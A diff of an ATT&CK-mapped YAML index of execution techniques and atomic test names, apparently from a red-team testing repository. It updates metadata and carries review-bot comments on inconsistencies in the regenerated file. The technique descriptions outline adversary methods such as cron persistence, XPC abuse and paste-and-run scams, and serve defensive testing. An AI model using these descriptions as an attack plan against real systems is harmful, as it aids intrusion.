object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests:
- name: OSTap Style Macro Execution
@@ -52652,26 +52969,7 @@ execution:
name: powershell
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -52688,6 +52986,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -52698,9 +52997,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -52708,8 +53011,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
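Review bot: `x_mitre_permissions_required: - User` is kept for T1053.003 (unchanged context above `x_mitre_remote_support: false`), while the same field is removed without replacement for T1059.007 (`User`, `Administrator`, `SYSTEM`) earlier in this patch and for T1569.001 (`User`, `root`) at the end of it. If the field is being retired along with the move to attack spec 3.2.0, T1053.003 should lose it as well; if not, the two removals look like a lossy regeneration. Either way the three objects should end up treated the same.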
@@ -52863,7 +53182,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
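Review bot: the `modified` timestamp for Component Object Model (T1559.001) moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-07-26T22:51:20.448Z`, while every other `modified` change in this patch moves forward to a 2024 date. A regression like this usually means the object was taken from an older ATT&CK bundle or the generator picked the wrong copy of a duplicated object; check where this entry came from before merging.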
@@ -52888,12 +53207,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
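Review bot: T1559.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0`, and unlike the other objects in this patch no `x_mitre_attack_spec_version: 3.2.0` is added in this hunk, so the object is left with no attack spec version at all. Together with the backwards `modified` timestamp in the previous hunk this points at a stale source for T1559.001; either add the 3.2.0 value or confirm the generator emits it for this object elsewhere.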
@@ -52973,11 +53290,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -53037,7 +53353,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests:
- name: AppleScript
@@ -53058,7 +53373,7 @@ execution:
name: sh
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -53156,9 +53471,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -53175,7 +53490,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
@@ -53256,14 +53570,14 @@ execution:
cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -53272,7 +53586,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -53309,11 +53623,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -53350,11 +53663,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
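Review bot: the platform list for T1059.009 changes from `Azure AD`, `Office 365` and `Google Workspace` to `Office Suite` and `Identity Provider` (the ATT&CK v16 platform consolidation), and the same rename is applied to T1059 later in this patch. Anything in this repository that filters techniques or builds per-platform index files on the old platform names will silently stop matching these techniques, so the platform-specific indexes should be regenerated in the same change and reviewed for entries that disappear.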
@@ -53373,13 +53685,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -53458,7 +53769,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
@@ -53497,7 +53807,7 @@ execution:
\n"
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -53508,6 +53818,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -53518,16 +53829,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -53558,9 +53869,6 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests:
- name: AutoIt Script Execution
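Review bot: for T1059 the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` keys are added near the top of the object (after `phase_name: execution` and `x_mitre_is_subtechnique: false`) and the old copies removed from the bottom here, whereas for every other object in this patch those keys stay at the bottom. Key order does not affect the parsed YAML, but it shows the generator's output order is not stable, and that instability is what turns small field changes into large reorder hunks elsewhere in this patch; consider sorting keys or preserving upstream order in the generator so diffs show only real changes.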
@@ -53606,7 +53914,7 @@ execution:
name: powershell
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -53672,9 +53980,8 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests:
- name: ExecIntoContainer
@@ -53757,32 +54064,7 @@ execution:
elevation_required: false
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
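Review bot: this hunk removes the `Launchctl Man` reference (`https://ss64.com/osx/launchctl.html`) together with the rest of the T1569.001 metadata, and the references re-added in the last hunk of the patch show only `mitre-attack`, `Sofacy Komplex Trojan` and `20 macOS Common Tools and Techniques`; the description on the unchanged line below still ends with `(Citation: Launchctl Man)`, so confirm the reference is re-added past the visible end of that hunk rather than dropped. The `Sofacy Komplex Trojan` entry previously listed `url` first and `source_name` last; the re-added form leads with `source_name`, which matches the other entries.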
@@ -53791,6 +54073,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -53803,19 +54086,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests:
- name: Launchctl
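Review bot: `x_mitre_permissions_required` (User, root) and `spec_version: '2.1'` are dropped from T1569.001 with nothing replacing them, and the same field disappears for T1559 and T1569 later in this diff, yet T1204.003 still carries `x_mitre_permissions_required: - User` in its unchanged context. Two things to confirm before merging: that the removal matches the upstream ATT&CK release being imported (rather than a partial export), and that nothing in this repository reads `x_mitre_permissions_required` to derive the elevation requirement of mapped atomics, since those consumers would now silently get no value for most techniques.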
@@ -53882,7 +54188,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
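Review bot: the `modified` timestamp for Network Device CLI moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`, and this object keeps `x_mitre_attack_spec_version: 2.1.0` while every other object in the diff is moved to 3.2.0. That pattern points at this technique being regenerated from an older source object than the rest of the file; worth checking which ATT&CK release the import actually read for it.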
@@ -53898,72 +54204,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
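Review bot: in the new T1204 description the bullet list is not followed by a blank line before the unchanged `For example, tech support scams can be facilitated ...` paragraph, so a Markdown renderer will fold that paragraph into the last bullet; the added `Coerceing users to copy, paste, and execute malicious code manually` line also has a typo ("Coercing"). Both come from upstream ATT&CK text, so the fix belongs upstream (or in a post-processing step) rather than by hand-editing this generated file, otherwise the next import reverts it. Note also that the Talos and Krebs citations that previously closed the whole sentence are now attached only to the JavaScript bullet, which changes what they are cited for.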
@@ -53971,7 +54280,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -53986,7 +54299,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -54013,6 +54326,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
